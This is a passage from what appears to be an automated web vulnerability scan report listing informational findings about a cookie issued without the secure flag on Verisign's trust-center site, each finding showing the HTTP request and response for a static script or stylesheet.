The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/popup.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 598
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(
...[SNIP]...

6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ
...[SNIP]...

6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5155
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle
...[SNIP]...

6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/script_log.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1408
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}}
function generateCall(level,message){var url='
...[SNIP]...

6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 89269
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
   Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/

/*
   
...[SNIP]...

6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/syscheck.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1470
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}}
function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o
...[SNIP]...

6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 57905
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi
...[SNIP]...

6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 22968
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
* Copyright . 1999-2009 TeaLeaf Technology, Inc.
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS''

...[SNIP]...

6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4605
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi
...[SNIP]...

6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19769
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro
...[SNIP]...

6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/utility.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8013
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;}
if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)
...[SNIP]...

6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/brand.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7437
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

@import "vrsn.css";
#vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;}
#vrsn_standard_bar_footer{border-top:1px solid #EDEDEE
...[SNIP]...

6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

